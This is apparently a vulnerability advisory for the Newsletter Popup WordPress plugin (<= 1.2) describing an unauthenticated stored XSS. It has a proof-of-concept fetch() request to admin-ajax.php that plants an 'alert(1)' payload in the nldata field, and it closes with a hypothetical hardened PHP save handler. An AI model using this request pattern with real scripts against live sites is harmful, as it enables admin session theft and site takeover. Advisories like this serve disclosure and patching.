wpexploit | Lana Codes | WPEX-ID:FED1E184-FF56-44FE-9876-D17C0156447A
May 02, 2023 - 12:00 a.m.

Newsletter Popup <= 1.2 - Unauthenticated Stored XSS

EPSS: 0.001 (Low); percentile: 37.7%

The plugin does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.

1. Create a Newsletter popup (any will do) and publish it.

2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly):

    fetch('http://localhost/wp-admin/admin-ajax.php', {
      method: 'POST',
      headers: new Headers({
        'Content-Type': 'application/x-www-form-urlencoded',
      }),
      body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)'
    })
      .then(response => response.text())
      .then(result => console.log(result))
      .catch(error => console.log('error', error));

3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record.

4. The alert will trigger successfully.
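
The missing sanitisation and escaping described above, shown as a hardened save handler and an escaped admin view. This is an added example, not the plugin's code or its actual fix: the function names, the `nlp_example_records` option, the public-form assumption and the `KEY=value` layout of `nldata` are hypothetical.

```php
<?php
// Hypothetical hardened handler for the savenewsletter AJAX action.
// Not the plugin's code: function names, the option name and the
// KEY=value layout of nldata are assumptions made for illustration.

// Assumed: the popup form is public, so the action stays reachable without
// login and every field is treated as attacker-controlled.
add_action( 'wp_ajax_savenewsletter', 'nlp_example_save' );
add_action( 'wp_ajax_nopriv_savenewsletter', 'nlp_example_save' );

function nlp_example_save() {
    $id   = isset( $_POST['nlid'] ) ? absint( $_POST['nlid'] ) : 0;
    $name = isset( $_POST['nlname'] ) ? sanitize_text_field( wp_unslash( $_POST['nlname'] ) ) : '';
    $raw  = ( isset( $_POST['nldata'] ) && is_string( $_POST['nldata'] ) ) ? wp_unslash( $_POST['nldata'] ) : '';

    // nldata is assumed to be a query string such as "EMAIL=user@example.com".
    wp_parse_str( $raw, $fields );
    $email = ( isset( $fields['EMAIL'] ) && is_string( $fields['EMAIL'] ) ) ? sanitize_email( $fields['EMAIL'] ) : '';

    // Input side: reject anything that is not a syntactically valid address.
    if ( ! $id || ! is_email( $email ) ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    $records   = get_option( 'nlp_example_records', array() );
    $records[] = array( 'nlid' => $id, 'nlname' => $name, 'email' => $email );
    update_option( 'nlp_example_records', $records, false );
    wp_send_json_success();
}

// Output side: escape at render time even though input was validated,
// so rows stored before the validation existed cannot execute in wp-admin.
function nlp_example_render_records() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    echo '<table>';
    foreach ( (array) get_option( 'nlp_example_records', array() ) as $row ) {
        printf(
            '<tr><td>%d</td><td>%s</td><td>%s</td></tr>',
            absint( $row['nlid'] ),
            esc_html( $row['nlname'] ),
            esc_html( $row['email'] )
        );
    }
    echo '</table>';
}
```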
